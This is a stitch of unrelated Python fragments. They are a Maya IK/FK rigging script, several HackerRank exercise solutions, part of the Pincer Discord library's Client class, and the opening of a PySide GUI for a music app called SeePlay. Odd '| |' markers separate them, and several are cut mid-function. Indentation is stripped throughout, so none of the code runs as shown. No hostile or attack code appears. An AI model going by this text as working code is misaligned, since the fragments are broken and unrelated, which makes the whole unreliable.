# Move pivots on clavicle joint
piv = cmds.xform(clavJoint, q=True, ws=True, t=True)
cmds.xform(clavController, ws=True, piv=piv)
cmds.xform(clavControllerGrp, ws=True, piv=piv)
cmds.orientConstraint(clavController, clavJoint)
# Parent ik and fk chain under clavicle controller
cmds.parent((ogChain[0]+"_fk_anim_grp"),(ogChain[0] + "_ik"), (ogChain[0] + "_fk"), clavController)
cmds.parent(clavControllerGrp, ctrlGrp)
def visCheck(vis):
if vis == "Arm":
asd = True
if vis == "Leg":
asd = False
cmds.checkBox(clavCheckbox_UI, e=1, vis=asd, v=asd)
# Buttons +1 and +3
count = 0
def addOneUnit(*args):
global count
count = count + 1
cmds.intField(scaleField_UI, v=1+count, e=1)
def addThreeUnit(*args):
global count
count = count + 3
cmds.intField(scaleField_UI, v=1+count, e=1)
def blendNodeFunc(scaleController, selectChain):
# Create some blendColors node with the same name of the joint
for x in range(chainLen):
blendColorsNode = cmds.createNode("blendColors", n = ogChain[x] + "_blend")
# Connect FK and IK chains into blendColors channels and then connect the output to the original joint chain
cmds.connectAttr((ogChain[x] + "_ik.rotate"), blendColorsNode + ".color1")
cmds.connectAttr((ogChain[x] + "_fk.rotate"), blendColorsNode + ".color2")
cmds.connectAttr((blendColorsNode + ".output"), (ogChain[x] + ".rotate" ))
cmds.connectAttr(switcherLoc[0]+".FKIK_Mode", blendColorsNode + ".blender")
ikChainBuild(scaleController, selectChain)
fkControllerCreator(scaleController, selectChain)
def constraintFunc(scaleController, selectChain):
# Create some blendColors node with the same name of the joint
for x in range(chainLen):
# Setup orient constraints
cmds.parentConstraint((ogChain[x] + "_ik"), ogChain[x])
cmds.parentConstraint((ogChain[x] + "_fk"), ogChain[x])
# Setup SDK naming convention
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
ikSdkDriven = ogChain[x] + "_parentConstraint1." + ogChain[x] + "_ikW0"
fkSdkDriven = ogChain[x] + "_parentConstraint1." + ogChain[x] + "_fkW1"
# Setup SDK
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(ikSdkDriven, cd=sdkDriver, v=0, dv=0)
cmds.setDrivenKeyframe(fkSdkDriven, cd=sdkDriver, v=1, dv=0)
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(ikSdkDriven, cd=sdkDriver, v=1, dv=1)
cmds.setDrivenKeyframe(fkSdkDriven, cd=sdkDriver, v=0, dv=1)
ikChainBuild(scaleController, selectChain)
fkControllerCreator(scaleController, selectChain)
def fkControllerCreator(fkSize, legOrArm):
orientController = cmds.optionMenu("UI_orientControllerMenu", q=1, v=1)
# Create controllers and group offsets
# Change rotation, color
for y in range(chainLen):
anim_group = cmds.group(em=1, n=ogChain[y] + "_fk_anim_grp")
fk_controller = cmds.circle(n=ogChain[y] + "_fk_anim")[0] # If not [0] it'll warn some stuff related to Maya underworld
# Set scale
cmds.scale(fkSize, fkSize, fkSize, fk_controller)
cmds.matchTransform(anim_group, ogChain[y])
cmds.delete(cmds.parentConstraint(ogChain[y], fk_controller))
cmds.parent(fk_controller, anim_group)
# Set controller orientation based on second axis
if orientController == "x": cmds.rotate(90,0,0, fk_controller)
if orientController == "y": cmds.rotate(0,90,0, fk_controller)
if orientController == "z": cmds.rotate(0,0,90, fk_controller)
# Freeze transform, delete history and set color
cmds.makeIdentity(fk_controller, a = 1, t = 1, r = 1, s = 0)
cmds.delete(fk_controller, ch = 1)
cmds.color(fk_controller, rgb=controllerColor)
# Set SDK visibility
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(ogChain[0] + "_fk_anim_grp.visibility", cd=sdkDriver, v=1, dv=0)
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(ogChain[0] + "_fk_anim_grp.visibility", cd=sdkDriver, v=0, dv=1)
# Lock .t and .s attributes
#for x in ["X", "Y", "Z"]:
#cmds.setAttr(fk_controller + ".translate" + x, k=0, l=1)
#cmds.setAttr(fk_controller + ".scale" + x, k=0, l=1)
# Create ordered hierarchy
for x in reversed(range(chainLen)):
if x == 0:
continue
cmds.parent(ogChain[x] + "_fk_anim_grp", ogChain[x-1] + "_fk_anim")
# Set orientConstraint _anim controllers with _fk hierarchy
for x in range(chainLen):
cmds.parentConstraint(ogChain[x] + "_fk_anim", ogChain[x] + "_fk")
# If leg chain is selected delete toe controller, else not
if legOrArm == "Leg":
if x == (chainLen-1):
cmds.delete(ogChain[chainLen-1] + "_fk_anim_grp")
def ikChainBuild(scaleIK, HandleName):
masterIkHandle = cmds.ikHandle(sj=ogChain[0] + "_ik", ee=ogChain[2] + "_ik", sol="ikRPsolver", n=side + HandleName + "_ikHandle")
cmds.setAttr(masterIkHandle[0] + ".visibility", 0)
if HandleName == "Arm":
#print ("scaleController", scaleField_UI)
armIk(scaleIK, masterIkHandle, HandleName)
else:
#print ("scaleController", scaleField_UI)
legIK(scaleIK, masterIkHandle, HandleName)
def armIk(armIkScale, armikHandle, pvName):
ikHandJoint = cmds.joint(n=side + "hand_ik")
cmds.delete(cmds.parentConstraint(ogChain[2] + "_ik", ikHandJoint))
cmds.makeIdentity(ikHandJoint, a = 1, t = 1, r = 1, s = 0)
if side == "l_":
cmds.move(10,0,0, ikHandJoint, r=1, os=1)
else:
cmds.move(-10,0,0, ikHandJoint, r=1, os=1)
cmds.parent(ikHandJoint, ogChain[2] + "_ik")
handikHandle = cmds.ikHandle(sj=ogChain[2] + "_ik", ee=ikHandJoint, n=side + "hand_ikHandle", sol="ikSCsolver")
cmds.parent(handikHandle[0], armikHandle[0])
#create IK controller ---> CUBE
crvIkCube = cmds.curve(d=1, p=[(-0.5, 0.5, -0.5), (0.5, 0.5, -0.5), (0.5, 0.5, 0.5),
(-0.5, 0.5, 0.5), (-0.5, -0.5, 0.5), (-0.5, -0.5, -0.5),
(-0.5, 0.5, -0.5), (-0.5, 0.5, 0.5), (-0.5, -0.5, 0.5),
(0.5, -0.5, 0.5), (0.5, 0.5, 0.5), (0.5, 0.5, -0.5),
(0.5, -0.5, -0.5), (0.5, -0.5, 0.5), (0.5, -0.5, -0.5), (-0.5, -0.5, -0.5)],
k=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5], n=side + "hand_ik_anim" )
# Rename shape node
shapeList = cmds.listRelatives(crvIkCube, s = True)
cmds.rename(shapeList, crvIkCube + "Shape")
crvIkCubeGrp = cmds.group(n=crvIkCube + "_grp")
cmds.delete(cmds.parentConstraint(ogChain[2] + "_ik", crvIkCubeGrp))
cmds.color(crvIkCube, rgb=controllerColor)
cmds.scale(armIkScale, armIkScale, armIkScale, crvIkCubeGrp)
cmds.parent(armikHandle[0], crvIkCube)
pvController = createSphere(nome= side+pvName+"_PV")
findPoleVector(loc=pvController, targetHandle=armikHandle[0])
cmds.addAttr(pvController, at="enum", enumName = "------", ln="Attributes", k=1, r=1)
cmds.addAttr(pvController, ln="Follow", k=1, r=1, min=0, max=1)
cmds.addAttr(pvController, ln="Follow_Clav_Hand", k=1, r=1, min=0, max=1, dv=0.5)
# Parent ikController and PV under _rig_GRP
cmds.parent(crvIkCubeGrp, pvController + "_grp" ,rigGrp)
#set SDK visibility
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(crvIkCubeGrp + ".visibility", cd=sdkDriver, v=0, dv=0)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=0, dv=0)
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(crvIkCubeGrp + ".visibility", cd=sdkDriver, v=1, dv=1)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=1, dv=1)
def legIK(ikFootScale, legikHandle, pvName):
ballikHandle = cmds.ikHandle(sj=ogChain[2] + "_ik", ee=ogChain[3] + "_ik", sol="ikSCsolver", n=side + "ball_ikHandle")
toeikHandle = cmds.ikHandle(sj=ogChain[3] + "_ik", ee=ogChain[4] + "_ik", sol="ikSCsolver", n=side + "toe_ikHandle")
# Create and place ik controller
ikFootControl = cmds.curve(d=2, p=[(0.997, 0, 1.789), (0, 0, 2.39), (-0.997,0,1.789), (-1.108, 0, 0), (-0.784, 0,-2.5),
(0, 0,-3), (0.784, 0, -2.5), (1.108, 0, 0), (0.997, 0, 1.789), (0, 0, 2.39)],
k=[0,1,2,3,4,5,6,7,8,9,10], n=side + "leg_anim_ik")
# Rename shape node
shapeList = cmds.listRelatives(ikFootControl, s = True)
| |
L[i - 2], L[i - 1], L[i] = L[i - 1], L[i], L[i - 2]
bribes += 2
else:
return "Too chaotic" # Expected person is more than 2 steps away.
return bribes
test_count = int(input())
for _ in range(test_count):
input()
line = list(map(int, input().split()))
print(bribe_count(line))
def brute_force(rt="O(n^2"): # First thing that came to mind.
# Brute Force: O(n^2) approach.
# Notes:
# Based on Bubble sort implementation in:
# from Leo_Python_Notes import Algorithms_Sort.BubbleSort()
# Everyone starts with 2. If count is 0 and a swap is desired: "Too chaotic"
def bribe_count(line):
ppl = [[x, 2] for x in line] # #[[label, bribe_count], [label, bc2] ...]
bribes = 0
for i in range(len(line) - 1):
for j in range(len(line) - i - 1):
if ppl[j][0] > ppl[j + 1][0]:
ppl[j], ppl[j + 1] = ppl[j + 1], ppl[j]
ppl[j + 1][1] -= 1
bribes += 1
if ppl[j + 1][1] == -1:
return "Too chaotic"
return bribes
test_count = int(input())
for _ in range(test_count):
input()
line = list(map(int, input().split()))
print(bribe_count(line))
addto(Arrays__NewYearChaos, ds.arrays, diff.hard, time.hour_5, date(2019,5,22), source.hackerrank, tag.optimization)
def Arrays__Minimum_swaps(doc="""Meta:"This took some effort" Time:40m Difficulty:Medium Date: TAG__Array TAG__Insert URL:https://www.hackerrank.com/challenges/minimum-swaps-2/problem"""):
# Python2 ported to Python3 via 2to3-3.7
# Interesting fact: We know where item belongs since there are no duplicate and arr[i] <= n
# [7, 1, 3, 2, 4, 5, 6]
# Let's try different sort approaches:
# # O(n)
# # Insertion Sort. Move elemen to where it belongs. -> OK?
# [6, 1, 3, 2, 4, 5, 7] 1
# [1, 6, 3, 2, 4, 5, 7] 2
# [1, 5, 3, 2, 4, 6, 7] 3
# [1, 4, 3, 2, 5, 6, 7] 4
# [1, 2, 3, 4, 5, 6, 7] 5 -> OK. Not like example given, but seems to work.
#
# # O(n^2)
# # Selection sort like. Pick the element that 'belongs' -> TOO SLOW.
# [7, 1, 3, 2, 4, 5, 6] 0
# [1, 7, 3, 2, 4, 5, 6] 1
# [1, 2, 3, 7, 4, 5, 6] 2
# [1, 2, 3, 4, 7, 5, 6] 3
# [1, 2, 3, 4, 5, 7, 6] 4
# [1, 2, 3, 4, 5, 6, 7] 4
#
# # Let's try Insertion-Sort like behaviour for Examples 0,1,3
# # E.g 0
# 4 3 1 2 | 0
# 2 3 1 4 | 1
# 1 2 3 4 | 3 -> OK.
#
# # E.g 1
# 2 3 4 1 5 | 0
# 3 2 4 1 5 | 1
# 4 2 3 1 5 | 2
# 1 2 3 4 5 | 3 -> OK.
#
# # E.g 2
# 1 3 5 2 4 6 7 | 0
# 1 5 3 2 4 6 7 | 1
# 1 4 3 2 5 6 7 | 2
# 1 2 3 4 5 6 7 | 3 -> OK.
# All work. Let's implement:
_ = input()
arr = list(map(int, input().split()))
curr_pos = 1 # curr_pos shall mean array index starting from 1 (not 0)
swaps = 0
while curr_pos != len(arr):
element_at_curr_pos = arr[curr_pos - 1]
if element_at_curr_pos != curr_pos:
# Swap curr element with where it belongs.
arr[curr_pos - 1] = arr[element_at_curr_pos - 1]
arr[element_at_curr_pos - 1] = element_at_curr_pos
swaps += 1
else:
curr_pos += 1
print(swaps)
addto(Arrays__Minimum_swaps, ds.arrays, diff.med, time.hour, date(2019,5,20), source.hackerrank)
def Arrays__LeftRotation(doc="""Meta:"" Time:15m Difficulty:Easy Date:19/05/12 TAG__Array TAG__Rotate URL:https://www.hackerrank.com/challenges/ctci-array-left-rotation/problem"""):
# Python2 ported to Python3 via 2to3-3.7
_, d = list(map(int, input().split()))
arr = input().split()
print(" ".join(arr[d:] + arr[:d]))
addto(Arrays__LeftRotation, ds.arrays, time.min_30, diff.easy, source.hackerrank)
def Arrays__2D_ArraysDS(d="""Meta: TAG__Arrays TAG__Arrays_2D Date:19/05/12 Difficulty:Easy Time:20m URL:https://www.hackerrank.com/challenges/2d-array/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=arrays"""):
# Python2 ported to Python3 via 2to3-3.7
from itertools import chain
L = []
for _ in range(6):
L.append(list(map(int, input().split())))
max_sum = None
for i in range(4):
for j in range(4):
hr_sum = sum(chain(L[i][j:j + 3], [L[i + 1][j + 1]], L[i + 2][j:j + 3]))
if max_sum == None or hr_sum > max_sum:
max_sum = hr_sum
print(max_sum)
addto(Arrays__2D_ArraysDS, ds.arrays, diff.easy, time.min_30, source.hackerrank)
def Arrays__repeated_string(doc="""Meta: TAG__Array TAG__Indexing TAG__mod TAG__counting Date:19/05/12 Difficulty:Easy Time:20m URL:https://www.hackerrank.com/challenges/repeated-string/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=warmup"""):
# Python2 ported to Python3 via 2to3-3.7
# Count ref: https://www.geeksforgeeks.org/python-count-occurrences-of-a-character-in-string/
def repeatedString(s, n):
a_in_s_count = sum([1 if x == "a" else 0 for x in s])
s_in_n_count = n / len(s)
full_a_count = s_in_n_count * a_in_s_count
s_in_n_count_remainder = n % len(s)
remainder_a_count = sum([1 if x == "a" else 0 for x in s[:s_in_n_count_remainder]])
return full_a_count + remainder_a_count
s = input()
n = int(input())
print(repeatedString(s, n))
addto(Arrays__repeated_string, ds.arrays, date(2019, 5, 12), diff.easy, time.min_30, source.hackerrank)
def Arrays__Jumping_clouds(doc="""Meta: TAG__Array Date:19/05/12 Difficulty:Easy Time:20m URL:https://www.hackerrank.com/challenges/jumping-on-the-clouds/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=warmup"""):
# Python2 ported to Python3 via 2to3-3.7
print(doc)
_, clouds = input(), list(map(int, input().split()))
jumps, curr_pos = 0, 0
end_pos = len(clouds) - 1
for _ in range(len(clouds)):
if curr_pos == end_pos:
break
if curr_pos == end_pos - 1:
jumps += 1
break
curr_pos += 2 if clouds[curr_pos + 2] == 0 else 1
jumps += 1
print(jumps)
addto(Arrays__Jumping_clouds, ds.arrays, diff.easy, time.min_30, date(2019,5,12), source.hackerrank)
def Array__counting_valleys(doc="""Meta: TAG__Array TAG__T Date: Difficulty:Easy Time:9m URL:https://www.hackerrank.com/challenges/counting-valleys/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=warmup"""):
# Python2 ported to Python3 via 2to3-3.7
# Keep track of current position. (height wise)
# Count # of occurences where we go down from sea level [0, -1]
_, path, valley_count, curr_pos = input(), input(), 0, 0
for step in path:
if curr_pos == 0 and step == "D":
valley_count += 1
curr_pos += 1 if step == "U" else -1
print(valley_count)
addto(Array__counting_valleys, ds.arrays, diff.easy, time.min_30, date(2019,5,10), source.hackerrank)
def Arrays__Matching_socks(doc="""Meta: TAG__set TAG__deduplicate Date:19/05/11 Difficulty:Easy Time:4m URL:https://www.hackerrank.com/challenges/sock-merchant/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=warmup"""):
# Python2 ported to Python3 via 2to3-3.7
# Solved in 4 minutes.
_ = input()
ar = list(map(int, input().split()))
seen_socks = set()
pair_count = 0
for s in ar:
if s in seen_socks:
pair_count += 1
seen_socks.remove(s)
else:
seen_socks.add(s)
print(pair_count)
addto(Arrays__Matching_socks, ds.arrays, diff.easy, date(2019,5,1), time.min_15, source.hackerrank)
def hackerrank_Python_Regex__Matrix_script(doc="""Meta: TAG__Regex TAG__Groups TAG__Lookahead TAG__substitution Date: Difficulty:Hard Time:65m URL:https://www.hackerrank.com/challenges/matrix-script/problem"""):
# Python2 ported to Python3 via 2to3-3.7
# LNOTE: This was hard :-O. Phew.
import re
Rows, Cols = list(map(int, input().split()))
wrapped = "".join([input() for _ in range(Rows)])
decoded = []
for i in range(Cols):
# Generate Regex:
# with i = 0,1,2, construct (.).. .(.). ..(.)
rx = ["."] * Cols
rx[i] = "(.)"
rx_str = "".join(rx)
for matched in re.finditer(rx_str, wrapped):
decoded.append(matched.group(1))
decoded_string = "".join(decoded)
# Note, reverse lookahead cannot contain wildcards. Workaround:
# \g<1> is reference to first group. I.e replace (group1)+[!@..] with (group1)+" "
# (?=...) only if ahead is...
print(re.sub("([a-zA-Z0-9]+)[!@#$%& ]+(?=.*[a-zA-Z0-9]+)", "\g<1> ", decoded_string))
def hackerrank_Python_Regex__Validating_postcode(doc="""Meta: TAG__Regex TAG__LookAhead Date:19/05/10 Difficulty:Medium Time:20m URL:https://www.hackerrank.com/challenges/validating-postalcode/problem"""):
# Python2 ported to Python3 via 2to3-3.7
# LNote: Tricky par is the alternating consequitive repeition without consuming.
regex_integer_in_range = r"^[1-9]\d{5}$" # Do not delete 'r'.
regex_alternating_repetitive_digit_pair = r"(.)(?=.\1)" # Do not delete 'r'.
import re
P = input()
print((bool(re.match(regex_integer_in_range, P))
and len(re.findall(regex_alternating_repetitive_digit_pair, P)) < 2))
def hackerrank_Python_Regex__validate_credit_card(doc="""Meta: TAG__Regex TAG__Repeating Date:19/05/10 Difficulty:Medium Time:21m URL:https://www.hackerrank.com/challenges/validating-credit-card-number/problem"""):
# Python2 ported to Python3 via 2to3-3.7
# LNOTE: I tend to make the mistake of forgetting to make exact match: ^....$
import re
for _ in range(int(input())):
line = input()
# - Validate it's either 16 digits or separeted into groups of 4.
# - Validate [456] as first group.
if re.match(r'^[456](\d{3}-\d{4}-\d{4}-\d{4}|\d{15})$', line):
# Remove dashes if there are any.
line2 = "".join(line.split("-"))
# Must not have 4 or more repeating digits.
if re.search(r"^(?!.*([0-9])\1{3,}).+$", line2): # If no 4 consequive.
print("Valid")
continue
print("Invalid")
def hackerrank_Python_Regex__valid_UID(doc="""Meta: TAG__Regex TAG__NoRepetition Date:19/05/10 Difficulty:Medium Time:30m URL:https://www.hackerrank.com/challenges/validating-uid/problem"""):
# Python2 ported to Python3 via 2to3-3.7
import re
def is_valid_UID(UID):
two_chars = bool(re.search(r"[A-Z].*[A-Z]", UID))
# Better: (.*[A-Z]){2}
three_digits = bool(re.search(r"[0-9].*[0-9].*[0-9]", UID))
alphaNum = bool(re.search(r"^[a-zA-Z0-9]{10}$", UID))
norepeat = bool(re.search(r"^(?!.*(\w).*\1{1,}).+$", UID)) # No Repetion. Interesting. -> .*(.).*\1+.*
# Explanation: https://stackoverflow.com/questions/31897806/regular-expression-to-match-string-without-repeated-characters
return two_chars and three_digits and alphaNum and norepeat
import os
if "USER" not in os.environ:
for _ in range(int(input())):
if is_valid_UID(input()):
print("Valid")
else:
print("Invalid")
raise SystemExit
ts = [
("B1CD102354", False) # 1 repeats
, ("B1CDEF2354", True)
, ("ABCD123HII", False) | |
# Copyright Pincer 2021-Present
# Full MIT License can be found in `LICENSE` at the project root.
from __future__ import annotations
import logging
from asyncio import iscoroutinefunction, run, ensure_future
from inspect import isasyncgenfunction
from typing import Optional, Any, Union, Dict, Tuple, List
from . import __package__
from ._config import events
from .commands import ChatCommandHandler
from .core.dispatch import GatewayDispatch
from .core.gateway import Dispatcher
from .core.http import HTTPClient
from .exceptions import InvalidEventName
from .middleware import middleware
from .objects import User, Intents, Guild, ThrottleInterface
from .objects.throttling import DefaultThrottleHandler
from .utils import get_index, should_pass_cls, Coro
_log = logging.getLogger(__package__)
MiddlewareType = Optional[Union[Coro, Tuple[str, List[Any], Dict[str, Any]]]]
_events: Dict[str, Optional[Union[str, Coro]]] = {}
for event in events:
event_final_executor = f"on_{event}"
# Event middleware for the library.
# Function argument is a payload (GatewayDispatch).
# The function must return a string which
# contains the main event key.
# As second value a list with arguments,
# and the third value value must be a dictionary.
# The last two are passed on as *args and **kwargs.
# NOTE: These return values must be passed as a tuple!
_events[event] = event_final_executor
# The registered event by the client. Do not manually overwrite.
_events[event_final_executor] = None
def event_middleware(call: str, *, override: bool = False):
"""
Middleware are methods which can be registered with this decorator.
These methods are invoked before any ``on_`` event.
As the ``on_`` event is the final call.
A default call exists for all events, but some might already be in
use by the library.
If you know what you are doing, you can override these default
middleware methods by passing the override parameter.
The method to which this decorator is registered must be a coroutine,
and it must return a tuple with the following format:
.. code-block:: python
tuple(
key for next middleware or final event [str],
args for next middleware/event which will be passed as *args
[list(Any)],
kwargs for next middleware/event which will be passed as
**kwargs [dict(Any)]
)
Two parameters are passed to the middleware. The first parameter is
the current socket connection with and the second one is the payload
parameter which is of type :class:`~.core.dispatch.GatewayDispatch`.
This contains the response from the discord API.
:Implementation example:
.. code-block:: pycon
>>> @event_middleware("ready", override=True)
>>> async def custom_ready(_, payload: GatewayDispatch):
>>> return "on_ready", [
>>> User.from_dict(payload.data.get("user"))
>>> ]
>>> @Client.event
>>> async def on_ready(bot: User):
>>> print(f"Signed in as {bot}")
:param call:
The call where the method should be registered.
Keyword Arguments:
:param override:
Setting this to True will allow you to override existing
middleware. Usage of this is discouraged, but can help you out
of some situations.
"""
def decorator(func: Coro):
if override:
_log.warning(
"Middleware overriding has been enabled for `%s`."
" This might cause unexpected behavior.", call
)
if not override and callable(_events.get(call)):
raise RuntimeError(
f"Middleware event with call `{call}` has "
"already been registered"
)
async def wrapper(cls, payload: GatewayDispatch):
_log.debug("`%s` middleware has been invoked", call)
return await (
func(cls, payload)
if should_pass_cls(func)
else func(payload)
)
_events[call] = wrapper
return wrapper
return decorator
for event, middleware in middleware.items():
event_middleware(event)(middleware)
class Client(Dispatcher):
def __init__(
self,
token: str, *,
received: str = None,
intents: Intents = None,
throttler: ThrottleInterface = DefaultThrottleHandler
):
"""
The client is the main instance which is between the programmer
and the discord API.
This client represents your bot.
:param token:
The secret bot token which can be found in
`<https://discord.com/developers/applications/<bot_id>/bot>`_
:param received:
The default message which will be sent when no response is
given.
:param intents:
The discord intents for your client.
"""
super().__init__(
token,
handlers={
# Gets triggered on all events
-1: self.payload_event_handler,
# Use this event handler for opcode 0.
0: self.event_handler
},
intents=intents or Intents.NONE
)
self.bot: Optional[User] = None
self.received_message = received or "Command arrived successfully!"
self.http = HTTPClient(token)
self.throttler = throttler
@property
def chat_commands(self):
"""
Get a list of chat command calls which have been registered in
the ChatCommandHandler.
"""
return [cmd.app.name for cmd in ChatCommandHandler.register.values()]
@staticmethod
def event(coroutine: Coro):
"""
Register a Discord gateway event listener. This event will get
called when the client receives a new event update from Discord
which matches the event name.
The event name gets pulled from your method name, and this must
start with ``on_``.
This forces you to write clean and consistent code.
This decorator can be used in and out of a class, and all
event methods must be coroutines. *(async)*
:Example usage:
.. code-block:: pycon
>>> # Function based
>>> from pincer import Client
>>>
>>> client = Client("token")
>>>
>>> @client.event
>>> async def on_ready():
... print(f"Signed in as {client.bot}")
>>>
>>> if __name__ == "__main__":
... client.run()
.. code-block :: pycon
>>> # Class based
>>> from pincer import Client
>>>
>>> class BotClient(Client):
... @Client.event
... async def on_ready(self):
... print(f"Signed in as {self.bot}")
>>>
>>> if __name__ == "__main__":
... BotClient("token").run()
:param coroutine: # TODO: add info
:raises TypeError:
If the method is not a coroutine.
:raises InvalidEventName:
If the event name does not start with ``on_``, has already
been registered or is not a valid event name.
"""
if not iscoroutinefunction(coroutine) \
and not isasyncgenfunction(coroutine):
raise TypeError(
"Any event which is registered must be a coroutine function"
)
name: str = coroutine.__name__.lower()
if not name.startswith("on_"):
raise InvalidEventName(
f"The event named `{name}` must start with `on_`"
)
if _events.get(name) is not None:
raise InvalidEventName(
f"The event `{name}` has already been registered or is not "
f"a valid event name."
)
_events[name] = coroutine
return coroutine
@staticmethod
def get_event_coro(name: str) -> Optional[Coro]:
call = _events.get(name.strip().lower())
if iscoroutinefunction(call) or isasyncgenfunction(call):
return call
def run(self):
"""Start the event listener"""
self.start_loop()
run(self.http.close())
async def handle_middleware(
self,
payload: GatewayDispatch,
key: str,
*args,
**kwargs
) -> Tuple[Optional[Coro], List[Any], Dict[str, Any]]:
"""
Handles all middleware recursively. Stops when it has found an
event name which starts with ``on_``.
:param payload:
The original payload for the event.
:param key:
The index of the middleware in ``_events``.
:param \\*args:
The arguments which will be passed to the middleware.
:param \\*\\*kwargs:
The named arguments which will be passed to the middleware.
:return:
A tuple where the first element is the final executor
(so the event) its index in ``_events``.
The second and third element are the ``*args``
and ``**kwargs`` for the event.
"""
ware: MiddlewareType = _events.get(key)
next_call, arguments, params = ware, [], {}
if iscoroutinefunction(ware):
extractable = await ware(self, payload, *args, **kwargs)
if not isinstance(extractable, tuple):
raise RuntimeError(
f"Return type from `{key}` middleware must be tuple. "
)
next_call = get_index(extractable, 0, "")
arguments = get_index(extractable, 1, [])
params = get_index(extractable, 2, {})
if next_call is None:
raise RuntimeError(f"Middleware `{key}` has not been registered.")
return (
(next_call, arguments, params)
if next_call.startswith("on_")
else await self.handle_middleware(
payload, next_call, *arguments, **params
)
)
async def execute_error(
self,
error: Exception,
name: str = "on_error",
*args,
**kwargs
):
"""
Raises an error if no appropriate error event has been found.
:param error:
The error which should be raised or passed to the event.
:param name:
The name of the event, and how it is registered by the client.
:param \\*args:
The arguments for the event.
:param \\*kwargs:
The named arguments for the event.
"""
if call := self.get_event_coro(name):
self.execute_event(call, error, *args, **kwargs)
else:
raise error
def execute_event(self, call: Coro, *args, **kwargs):
"""
Invokes an event.
:param call:
The call (method) to which the event is registered.
:param \\*args:
The arguments for the event.
:param \\*kwargs:
The named arguments for the event.
"""
def execute(*_args, **_kwargs):
ensure_future(call(*_args, **_kwargs))
if should_pass_cls(call):
args = (self, *args)
execute(*args, **kwargs)
async def process_event(self, name: str, payload: GatewayDispatch):
"""
Processes and invokes an event and its middleware.
:param name:
The name of the event, this is also the filename in the
middleware directory.
:param payload:
The payload sent from the Discord gateway, this contains the
required data for the client to know what event it is and
what specifically happened.
"""
try:
| |
<filename>gui.py
from PySide import QtGui, QtCore
import pymouse
import watchman
import collections
import threading
import time
import mixer
window_w = 640
window_h = 400
class SPApp(QtGui.QMainWindow):
orch_text = "A light orchestral accompaniment, reacting to colour changes."
elec_text = "A soft-pad synth accompaniment, reacting to colour changes."
horr_text = "A highly reactive accompaniment, with orchestral instrumentation."
sile_text = "A reactive solo piano accompaniment."
acti_text = "A reactive and frantic orchestral accompaniment."
infotexts = collections.OrderedDict()
prog_types = collections.OrderedDict()
mode_types = collections.OrderedDict()
user_inputsrc = ""
user_inputsrcinfo = ""
user_type = ""
user_genre = ""
user_key = ""
user_mode = ""
user_tempo = ""
user_tempo_modifier = ""
user_tsig = ""
user_inputregion = []
user_score_title = "SeePlay auto-score"
user_sheetmusic = False
user_midioutput = False
user_prog_type = ""
screen_x = 0
screen_y = 0
def __init__(self):
super(SPApp, self).__init__()
self.init_ui()
self.open_mixer()
def populate_dictionaries(self):
self.infotexts["Standard A"] = "A standard, balanced ambient profile. (colour driven)"
# self.infotexts["Standard B"] = "A standard, balanced ambient profile. (motion driven)"
# self.infotexts["Sparse"] = "A more spaced out ambient profile."
self.prog_types["None"] = "none"
self.prog_types["Random"] = "random"
self.prog_types["Relative (I VI)"] = "relative"
self.prog_types["Blues (I IV V)"] = "blues"
self.prog_types["I to V"] = "fifth"
self.prog_types["50s (I VI IV V)"] = "50s"
self.prog_types["Circle of fifths"] = "circ5"
self.prog_types["Circle of fourths"] = "circ4"
self.mode_types["Major"] = "major"
self.mode_types["Minor"] = "minor"
self.mode_types["Ionian"] = "ionian"
self.mode_types["Dorian"] = "dorian"
self.mode_types["Phrygian"] = "phrygian"
self.mode_types["Lydian"] = "lydian"
self.mode_types["Mixolydian"] = "mixolydian"
self.mode_types["Aeolian"] = "aeolian"
self.mode_types["Locrian"] = "locrian"
self.mode_types["Arabic"] = "arabic"
def init_ui(self):
self.center()
self.setWindowTitle('SeePlay')
self.setFixedSize(window_w, window_h)
m = pymouse.PyMouse()
screencoords = m.screen_size()
self.screen_x = int(screencoords[0])
self.screen_y = int(screencoords[1])
boxheight = 30
self.populate_dictionaries()
# SETTING THE SCENE
leftbg = QtGui.QLabel(self)
leftbg.resize(window_w*0.33,window_h)
leftbg.move(0,0)
leftbg.setStyleSheet("QLabel { background-color: #333333; color: #EEEEEE; }")
rightbgtop = QtGui.QLabel(self)
rightbgtop.resize(window_w*0.68,window_h)
rightbgtop.move(window_w*0.33,0)
rightbgtop.setStyleSheet("QLabel { background-color: #666666; color: #EEEEEE; }")
rightbgbtm = QtGui.QLabel(self)
rightbgbtm.resize(window_w*0.68,window_h)
rightbgbtm.move(window_w*0.33,window_h*0.5)
rightbgbtm.setStyleSheet("QLabel { background-color: #666666; color: #EEEEEE; }")
title = QtGui.QLabel(self)
title.resize(window_w*0.33,35)
title.move(0,0)
title.setText('SeePlay')
title.setStyleSheet("QLabel { padding: 5px; font-size: 20px; text-align: center; background-color: rgba(100, 100, 100, 100); color: #EFEFEF; }")
# INTERACTIVE CONTROLS
# termout = QtGui.QTextEdit(self)
# termout.resize(window_w*0.33-10,window_h*0.7)
# termout.move(5,boxheight+10)
# termout.setReadOnly(True)
watchbtn_slot = 0
stop_slot = 2
midiout_slot = 3
sheetout_slot = 4
mixer_slot = 5
# oldwatchbtn = QtGui.QPushButton('Old school sampling', self)
# oldwatchbtn.resize(window_w * 0.33 - 10, boxheight)
